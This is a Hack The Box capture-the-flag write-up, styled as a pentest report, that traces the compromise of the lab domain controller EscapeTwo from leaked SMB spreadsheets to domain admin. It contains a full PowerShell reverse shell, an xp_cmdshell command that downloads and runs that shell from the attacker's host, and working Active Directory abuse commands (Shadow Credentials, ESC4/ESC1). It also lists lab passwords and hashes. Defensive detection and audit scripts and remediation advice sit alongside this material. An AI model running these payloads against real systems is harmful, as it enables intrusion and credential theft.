
2026-05-24 • htb • easy • windows

HTB - EscapeTwo

Initial credentials expose an SMB share containing Excel files that leak MSSQL service-account credentials. Authenticating as sa enables xp_cmdshell, yielding RCE as sql_svc. A plaintext password found in an installation INI file is reused by the ryan account, granting WinRM access and the user flag. Ryan holds WriteOwner over the ca_svc service account, which is abused to add GenericAll, perform a Shadow Credentials attack to recover ca_svc's NT hash, and discover an ESC4-vulnerable ADCS template. Rewriting the template as ESC1 and requesting a certificate for the administrator UPN produces a PFX from which the administrator hash is extracted, completing the domain compromise.

Tags: smb-enumeration, mssql, xp-cmdshell, adcs, esc4, esc1, shadow-credentials, bloodyad, certipy, pass-the-hash
Tools: nmap, nxc, smbclient, mssqlclient, bloodyad, certipy, evil-winrm

Hack The Box — EscapeTwo

Easy | Windows | Hack The Box


Field        | Value
Report Date  | 24 May 2026
Assessed By  | RobInTheHood
Target IP    | 10.129.232.128
Hostname     | DC01
Domain       | sequel.htb

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine EscapeTwo. The objective was to obtain domain-administrator-level access in an authorised lab environment and document the attack path with reproducible evidence.

Pre-supplied credentials (rose:KxEPkKe6R8su) expose an SMB share called Accounting Department containing Excel spreadsheets that disclose credentials for several accounts, including the MSSQL sa account. Authenticating to the SQL Express instance as sa allows xp_cmdshell to be enabled, delivering a reverse shell as sql_svc. A plaintext password stored in the SQL installation configuration file is reused by the domain account ryan, granting WinRM access and the user flag.

BloodHound reveals that ryan holds WriteOwner over the ca_svc service account. This is leveraged with BloodyAD to grant GenericAll, enabling a Shadow Credentials attack via Certipy that returns ca_svc’s NT hash. Re-running Certipy as ca_svc uncovers an ESC4-vulnerable certificate template (DunderMifflinAuthentication). The template is rewritten to ESC1 configuration, a certificate is requested for the administrator UPN, and the resulting PFX is used to extract the administrator’s NT hash — completing full domain compromise via pass-the-hash.


2. Scope

Field             | Value
Target IP         | 10.129.232.128
Hostname          | DC01
Domain            | sequel.htb
Operating System  | Windows Server 2019 Build 17763
Machine Rating    | Easy
Environment       | Hack The Box — Authorised Training Lab
Assessment Date   | 24 May 2026
Assessor          | RobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — credential, configuration, and trust-path analysis
  • Exploitation — initial access through validated vulnerability paths
  • Lateral Movement — privilege pivoting and cross-context execution
  • Privilege Escalation — full compromise to domain-administrator context
  • Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase                 | Technique                                                                           | MITRE ATT&CK
Recon                 | Nmap — DC port profile (53/88/389/445/1433)                                         | T1046
Enumeration           | SMB share listing with rose → Accounting Department share → Excel credential dump   | T1021.002
Enumeration           | LDAP user enumeration → BloodHound collection                                       | T1087.002
Initial Access        | MSSQL sa login → xp_cmdshell → PowerShell reverse shell as sql_svc                  | T1059.001 · T1190
Credential Access     | Plaintext password in sql-Configuration.INI                                         | T1552.001
Lateral Movement      | Password reuse — ryan WinRM with sql_svc password                                   | T1078
Privilege Escalation  | WriteOwner on ca_svc → GenericAll → Shadow Credentials → NT hash                    | T1484.001 · T1649
Privilege Escalation  | ESC4 template → rewrite to ESC1 → cert for administrator UPN → pass-the-hash        | T1649 · T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

Because the target is a domain controller, Kerberos time-skew restrictions apply. The clock is synchronised before any Kerberos-dependent tool is used:

faketime "$(rdate -n $TARGET -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh

A fast service scan of the target:

nmap -sC -sV -F $TARGET -oN nmap.txt

Port      | Service
53/tcp    | DNS
88/tcp    | Kerberos
135/tcp   | RPC
139/tcp   | NetBIOS
389/tcp   | LDAP
445/tcp   | SMB
1433/tcp  | MS-SQL

The port profile is consistent with a Windows domain controller. The presence of MS-SQL on 1433 alongside SMB is immediately notable.


Enumeration — SMB

Using the supplied credentials, the available shares are listed:

nxc smb "$TARGET" -u "rose" -p "KxEPkKe6R8su" --shares
Accounting Department   READ
ADMIN$                  Remote Admin
C$                      Default share
IPC$          READ      Remote IPC
NETLOGON      READ      Logon server share
SYSVOL        READ      Logon server share
Users         READ

The Accounting Department share stands out as a non-default readable share. Connecting to it reveals two Excel spreadsheets:

smbclient //"$TARGET"/"Accounting Department" --user=rose --password=KxEPkKe6R8su
accounting_2024.xlsx    10217  Sun Jun  9 06:14:49 2024
accounts.xlsx            6780  Sun Jun  9 06:52:07 2024

After downloading and inspecting both files, the following credentials are extracted:

angela@sequel.htb  : 0fwz7Q4mSpurIt99
oscar@sequel.htb   : 86LxLBMgEWaKUnBG
kevin@sequel.htb   : Md9Wlq1E5bZnVDVo
sa@sequel.htb      : MSSQLP@ssw0rd!

Enumeration — LDAP & BloodHound

nxc ldap $TARGET -u 'rose' -p 'KxEPkKe6R8su' --users
Administrator   Built-in administrator
Guest
krbtgt
michael
ryan
oscar
sql_svc
rose
ca_svc

BloodHound data is collected for deeper ACL analysis:

nxc ldap $TARGET -u 'rose' -p 'KxEPkKe6R8su' -d "sequel.htb" -k \
    --bloodhound -c All --dns-server 10.129.232.128

Two service accounts are particularly interesting: sql_svc and ca_svc. A Kerberoasting attempt against SPNs yields hashes, but none are crackable offline.


Initial Access — MSSQL xp_cmdshell

The sa credentials from the Excel files are used to authenticate to the SQL Express instance:

mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.129.232.128
SQL (sa  dbo@master)>

xp_cmdshell is enabled through the advanced configuration options:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master..xp_cmdshell 'whoami'
sequel\sql_svc

A PowerShell reverse shell payload is hosted on a local HTTP server:

# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.141",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}

The payload is downloaded and executed via SQL:

EXEC master..xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.141:8080/shell.ps1'')"'

A reverse shell as sequel\sql_svc is received on the listener.


Credential Access — SQL Installation Configuration

With a shell as sql_svc, the SQL Server installation directory is browsed. The unattended installation configuration file retains plaintext credentials:

C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI

SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
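The credential-at-rest problem above is easy to audit for. The following is an added example, not code from the original report: a small scanner that reads an unattended-installation INI, flags any key whose name suggests a secret, masks the value for reporting, and produces a sanitised copy that could replace the file after deployment. The INI text is constructed from the fields shown above (the [OPTIONS] section header and the key-name pattern list are assumptions for the example).

```python
"""Flag and redact plaintext secrets in unattended-install INI files.

Added example for the EscapeTwo report; not part of the original writeup.
"""
import configparser
import re
from typing import List, Tuple

# Key-name fragments that commonly carry secrets in SQL Server / Windows
# setup files (assumption: extend to match your own deployment tooling).
SECRET_KEY_RE = re.compile(r"(PASSWORD|PASSWD|PWD|SECRET|TOKEN)", re.IGNORECASE)

# Constructed sample mirroring the fields seen in sql-Configuration.INI.
SAMPLE_INI = """\
[OPTIONS]
ACTION="Install"
INSTANCENAME="SQLEXPRESS"
SQLSVCACCOUNT="SEQUEL\\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
"""


def mask(value: str) -> str:
    """Keep the first two characters so a finding is recognisable but not reusable."""
    v = value.strip('"')
    return v[:2] + "*" * max(len(v) - 2, 0)


def find_secrets(ini_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, masked_value) for every non-empty secret-looking key."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # preserve key case exactly as written in the file
    cp.read_string(ini_text)
    findings: List[Tuple[str, str, str]] = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if SECRET_KEY_RE.search(key) and value.strip('"'):
                findings.append((section, key, mask(value)))
    return findings


def sanitise(ini_text: str) -> str:
    """Return the INI with every secret value replaced by a REDACTED marker.

    Line-oriented on purpose: the rest of the file (order, comments, quoting)
    is preserved so the sanitised copy remains a valid setup file.
    """
    out: List[str] = []
    for line in ini_text.splitlines():
        key, sep, _ = line.partition("=")
        if sep and SECRET_KEY_RE.search(key.strip()):
            out.append(f'{key.strip()}="<REDACTED>"')
        else:
            out.append(line)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for section, key, masked in find_secrets(SAMPLE_INI):
        print(f"[{section}] {key} = {masked}")
    print(sanitise(SAMPLE_INI))
```

Run against the real file (or a whole directory of *.INI / unattend.xml files) as a post-install step; anything find_secrets reports is a candidate for deletion or for the sanitised rewrite.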

Lateral Movement — Password Reuse to ryan

The C:\Users directory shows a profile for ryan. The sql_svc password is tested against ryan’s account over WinRM:

nxc winrm "$TARGET" -u 'ryan' -p 'WqSZAF6CysDQbGb3'
WINRM  10.129.232.128  5985  DC01  [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (admin)
evil-winrm -u "ryan" -p "WqSZAF6CysDQbGb3" -i "$TARGET"

User Flag

*Evil-WinRM* PS C:\Users\ryan> type "C:/Users/ryan/Desktop/user.txt"
71faafbb8336f7a44c5a8430843c8b97

Privilege Escalation — WriteOwner on ca_svc → Shadow Credentials

BloodHound shows that ryan holds WriteOwner on the ca_svc service account. This ACL chain is exploited in two steps using BloodyAD.

Step 1 — Take ownership of ca_svc:

bloodyad -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 \
    -H dc01.sequel.htb --dns 10.129.232.128 set owner ca_svc ryan
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc

Step 2 — Grant GenericAll to ryan over ca_svc:

bloodyad -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 \
    -H dc01.sequel.htb --dns 10.129.232.128 add genericAll ca_svc ryan
[+] ryan has now GenericAll on ca_svc

With full control, a Shadow Credentials attack is performed. Certipy adds a Key Credential to ca_svc, authenticates with the generated certificate, and returns the account’s NT hash:

certipy shadow auto -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 \
    -account ca_svc -dc-ip 10.129.232.128
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
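Both steps of this chain leave a directory-change trail on the domain controller: the owner/DACL rewrite and the Key Credential addition each modify an attribute on the ca_svc object, which Windows records as Security event 5136 ("A directory service object was modified") when the Audit Directory Service Changes subcategory is enabled and the object carries a SACL. The following is an added detection example, not part of the original report: it runs simple rules over a few constructed 5136 records (the field names follow the event's data fields; the sample values, the allow-list and the severities are assumptions for the example) and correlates an ACL rewrite followed by a key-credential write by the same actor on the same object.

```python
"""Detect ACL rewrite + Shadow Credentials on AD accounts from event 5136.

Added example for the EscapeTwo report; not part of the original writeup.
"""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# 5136 OperationType value meaning "Value Added".
VALUE_ADDED = "%%14674"

# Principals expected to write these attributes (assumption: provisioning
# automation, the DC itself). Anything else is alert-worthy.
ALLOWED_WRITERS = {"SEQUEL\\Administrator", "SEQUEL\\DC01$"}

# Attributes whose modification on a user object warrants an alert.
WATCHED_ATTRIBUTES = {
    "msDS-KeyCredentialLink": "Shadow Credentials: key credential added",
    "nTSecurityDescriptor": "Owner/DACL rewritten on account",
}

# Constructed sample records shaped like the data fields of event 5136.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "5136", "SubjectUserName": "SEQUEL\\ryan",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectUserName": "SEQUEL\\ryan",
     "ObjectDN": "CN=ca_svc,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectUserName": "SEQUEL\\Administrator",
     "ObjectDN": "CN=ryan,CN=Users,DC=sequel,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectUserName": "SEQUEL\\DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=sequel,DC=htb", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
]


@dataclass
class Alert:
    rule: str
    actor: str
    target: str
    severity: str


def evaluate(events: List[Dict[str, str]]) -> List[Alert]:
    """Apply the per-event rules, then the correlation rule across events."""
    alerts: List[Alert] = []
    seen: Dict[Tuple[str, str], Set[str]] = {}
    for ev in events:
        if ev.get("EventID") != "5136" or ev.get("ObjectClass") != "user":
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr not in WATCHED_ATTRIBUTES or ev.get("OperationType") != VALUE_ADDED:
            continue
        actor, target = ev["SubjectUserName"], ev["ObjectDN"]
        if actor in ALLOWED_WRITERS:
            continue
        severity = "high" if attr == "msDS-KeyCredentialLink" else "medium"
        alerts.append(Alert(WATCHED_ATTRIBUTES[attr], actor, target, severity))
        seen.setdefault((actor, target), set()).add(attr)
    # Correlation: the same actor rewrote the ACL and then added a key
    # credential on the same account, which is exactly the chain above.
    for (actor, target), attrs in seen.items():
        if attrs == set(WATCHED_ATTRIBUTES):
            alerts.append(Alert("ACL rewrite followed by key credential on same account",
                                actor, target, "critical"))
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity.upper():8}] {a.rule}: {a.actor} -> {a.target}")
```

The per-event rules fire on the two modifications individually; the correlation rule is what turns them into a single high-confidence finding. In production the allow-list should be derived from the principals that legitimately manage key credentials (for example the accounts used by Windows Hello for Business provisioning), not hard-coded.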

Privilege Escalation — ESC4 → ESC1 → Administrator Certificate

Certipy is re-run as ca_svc to enumerate vulnerable certificate templates:

certipy find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -dc-ip 10.129.232.128 -vulnerable -stdout

The DunderMifflinAuthentication template is flagged as ESC4: ca_svc (a member of Cert Publishers) holds dangerous write permissions over it.

[!] Vulnerabilities
  ESC4 : User has dangerous permissions.

The template is rewritten to Certipy’s default (ESC1) configuration, which lets the enrollee supply the subject alternative name (SAN):

certipy template -u ca_svc@sequel.htb \
    -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -template DunderMifflinAuthentication \
    -write-default-configuration -no-save
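What the rewrite changes is a handful of template attributes: the ENROLLEE_SUPPLIES_SUBJECT bit in msPKI-Certificate-Name-Flag, no manager approval (PEND_ALL_REQUESTS clear in msPKI-Enrollment-Flag), zero required authorized signatures (msPKI-RA-Signature), an EKU usable for AD authentication, and enrollment rights for a low-privileged group. The following is an added audit example, not code from the report or from Certipy: it models a template's attributes and DACL, reports ESC1 when all of those conditions hold, and reports ESC4 when a non-administrative principal holds write rights over the template object. The flag bits, access-mask bits and EKU OIDs are the documented AD CS / AD values; the two template records (before and after the rewrite) are constructed, since the report does not print the template's raw attributes.

```python
"""Classify a certificate template for ESC1 and ESC4 conditions.

Added example for the EscapeTwo report; not the report's or Certipy's code.
"""
from dataclasses import dataclass, field
from typing import List, Set

# msPKI-Certificate-Name-Flag: enrollee may supply subject / SAN in the CSR.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: every request is held for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make the issued certificate usable for AD authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# AD access-mask bits that allow rewriting a template object or its ACL.
ADS_RIGHT_DS_WRITE_PROP = 0x00000020
ADS_RIGHT_WRITE_DAC = 0x00040000
ADS_RIGHT_WRITE_OWNER = 0x00080000
ADS_RIGHT_GENERIC_ALL = 0x10000000
ADS_RIGHT_GENERIC_WRITE = 0x40000000
WRITE_MASK = (ADS_RIGHT_DS_WRITE_PROP | ADS_RIGHT_WRITE_DAC | ADS_RIGHT_WRITE_OWNER
              | ADS_RIGHT_GENERIC_ALL | ADS_RIGHT_GENERIC_WRITE)

# Principals for whom write access over templates is expected (assumption).
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM"}
# Broad groups whose enrollment rights make a template reachable by anyone.
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


@dataclass
class Ace:
    principal: str
    access_mask: int


@dataclass
class Template:
    name: str
    name_flag: int               # msPKI-Certificate-Name-Flag
    enrollment_flag: int         # msPKI-Enrollment-Flag
    ra_signatures: int           # msPKI-RA-Signature
    ekus: Set[str]               # pKIExtendedKeyUsage (empty means any purpose)
    enroll_principals: Set[str]  # holders of the Enroll extended right
    aces: List[Ace] = field(default_factory=list)


def is_esc1(t: Template, low_priv: Set[str] = LOW_PRIV) -> bool:
    """True when a low-privileged enrollee can request a cert with a chosen SAN."""
    return (
        bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        and not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)
        and t.ra_signatures == 0
        and (not t.ekus or bool(t.ekus & AUTH_EKUS))
        and bool(t.enroll_principals & low_priv)
    )


def esc4_writers(t: Template) -> List[str]:
    """Non-administrative principals that can rewrite the template object."""
    return [a.principal for a in t.aces
            if a.access_mask & WRITE_MASK and a.principal not in PRIVILEGED]


def classify(t: Template, low_priv: Set[str] = LOW_PRIV) -> List[str]:
    labels = []
    if is_esc1(t, low_priv):
        labels.append("ESC1")
    if esc4_writers(t):
        labels.append("ESC4")
    return labels


# Constructed records: ca_svc's group (Cert Publishers) holds GenericAll over the
# template in both states; only the attributes differ before/after the rewrite.
_ACES = [Ace("Domain Admins", ADS_RIGHT_GENERIC_ALL), Ace("Cert Publishers", ADS_RIGHT_GENERIC_ALL)]
TEMPLATE_BEFORE = Template("DunderMifflinAuthentication", 0, 0, 0,
                           {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"}, _ACES)
TEMPLATE_AFTER = Template("DunderMifflinAuthentication", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
                          {"1.3.6.1.5.5.7.3.2"}, {"Domain Users"}, _ACES)

if __name__ == "__main__":
    for t in (TEMPLATE_BEFORE, TEMPLATE_AFTER):
        print(t.name, classify(t), "writers:", esc4_writers(t))
```

The point the classifier makes explicit is the one in the Key Takeaways: the "before" record is already ESC4 because of the ACL alone, and a single attribute rewrite adds ESC1 without touching the ACL, so remediation has to fix the write permission, not just the flags.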

A certificate is requested impersonating the administrator account via UPN:

certipy req -u ca_svc@sequel.htb \
    -hashes 3b181b914e7a9d5508ea1e20bc2b7fce \
    -ca sequel-DC01-CA \
    -template DunderMifflinAuthentication \
    -upn administrator@sequel.htb
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Saving certificate and private key to 'administrator.pfx'

The PFX is used to authenticate and recover the administrator NT hash:

certipy auth -pfx administrator.pfx -dc-ip 10.129.232.128
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Root Flag

evil-winrm -u "administrator" -H 7a8d4e04986afa8ed4060f75e5a0b3ff -i 10.129.232.128
*Evil-WinRM* PS C:\Users\Administrator> type "C:/Users/Administrator/Desktop/root.txt"
bfaf53a902a9cdd4a5c7db3f1348a030

6. Proof of Access

Level                 | Evidence
User                  | 71faafbb8336f7a44c5a8430843c8b97
Root / Administrator  | bfaf53a902a9cdd4a5c7db3f1348a030

7. Credentials Discovered

Account        | Secret                            | Type             | Source
rose           | KxEPkKe6R8su                      | Domain password  | Pre-supplied
angela         | 0fwz7Q4mSpurIt99                  | Domain password  | accounts.xlsx SMB share
oscar          | 86LxLBMgEWaKUnBG                  | Domain password  | accounts.xlsx SMB share
kevin          | Md9Wlq1E5bZnVDVo                  | Domain password  | accounts.xlsx SMB share
sa             | MSSQLP@ssw0rd!                    | MSSQL password   | accounts.xlsx SMB share
sql_svc        | WqSZAF6CysDQbGb3                  | Domain password  | sql-Configuration.INI plaintext
ryan           | WqSZAF6CysDQbGb3                  | Domain password  | Password reuse from sql_svc
ca_svc         | 3b181b914e7a9d5508ea1e20bc2b7fce  | NT hash          | Shadow Credentials
administrator  | 7a8d4e04986afa8ed4060f75e5a0b3ff  | NT hash          | ESC4 → ESC1 ADCS abuse

8. Impact Assessment

Successful exploitation resulted in complete domain compromise through a multi-stage chain. Sensitive credentials stored in accessible SMB shares provided a foothold into the MSSQL service tier. Misuse of xp_cmdshell bridged the database to OS-level code execution. A plaintext password preserved in an installation configuration file enabled lateral movement to a domain user with privileged ADCS ACLs. The combination of WriteOwner, Shadow Credentials, and a write-vulnerable certificate template allowed full domain controller compromise without ever touching a password cracker or network exploit.


9. Remediation Summary

Priority  | Action
Critical  | Remove credentials from the Accounting Department SMB share and store them in a secrets manager; restrict share access to only required personnel.
Critical  | Disable xp_cmdshell on all MSSQL instances; enforce the principle of least privilege — the sa account should not be operational.
Critical  | Delete or sanitise sql-Configuration.INI and similar unattended installation files that retain plaintext passwords after deployment.
High      | Audit ADCS template permissions; remove Write rights for non-administrative principals over certificate templates.
High      | Review ACL delegations on service accounts (WriteOwner, GenericAll); remove ryan’s WriteOwner over ca_svc.
High      | Enforce unique passwords across service and user accounts to prevent credential reuse pivots.
Medium    | Enable LDAP signing and channel binding to impede BloodHound-style unauthenticated ACL enumeration.

10. Key Takeaways

  • Readable file shares are high-value targets even when they appear administrative — spreadsheets routinely contain credentials with wider domain impact than the share permissions suggest.
  • Unattended installation files (*.INI, *.xml, unattend.xml) frequently preserve plaintext credentials long after deployment; they should be purged from production systems as a post-install step.
  • ACL-based attacks via BloodyAD require no exploit and no vulnerability — only a misconfigured delegation. WriteOwner → GenericAll → Shadow Credentials is a deterministic, low-noise path to credential recovery.
  • ESC4 is often overlooked in favour of higher-profile ADCS misconfigurations. The ability to rewrite a template’s configuration transforms it into ESC1 on demand, making any ESC4 finding effectively equivalent to ESC1 from an impact standpoint.
  • Pass-the-hash over WinRM remains a reliable final step on Windows environments that have not enforced Protected Users or Credential Guard.

11. Tools Used

Tool           | Purpose
nmap           | Port and service discovery
nxc (NetExec)  | SMB share enumeration, LDAP user enumeration, WinRM authentication testing
smbclient      | SMB share browsing and file download
mssqlclient.py | MSSQL authentication and xp_cmdshell execution
BloodHound     | ACL and attack-path analysis in Active Directory
BloodyAD       | WriteOwner and GenericAll ACL manipulation
Certipy        | Shadow Credentials, ADCS template enumeration, ESC4/ESC1 exploitation
evil-winrm     | WinRM shell and pass-the-hash authentication

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.


End of Report — EscapeTwo | RobInTheHood | 24 May 2026